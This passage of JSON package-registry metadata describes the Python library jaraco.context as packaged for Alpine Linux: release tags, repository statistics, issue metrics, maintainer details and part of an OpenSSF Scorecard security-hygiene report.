ts"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.650Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":29.20053862650242,"forks_count":29.145678519774577,"docker_downloads_count":null,"average":14.58655428656925},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2146,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-05-23T07:14:07.492Z","updated_at":"2023-05-23T07:14:07.492Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3639,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1238},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-08-22T05:06:15.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":6168351,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2021-11-02T12:52:37.000Z","latest_release_published_at":"2021-11-02T12:52:37.000Z","latest_release_number":"4.1.1-r0","last_synced_at":"2026-03-21T13:15:57.923Z","created_at":"2023-02-01T00:03:06.525Z","updated_at":"2026-08-06T19:26:18.667Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.15/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not 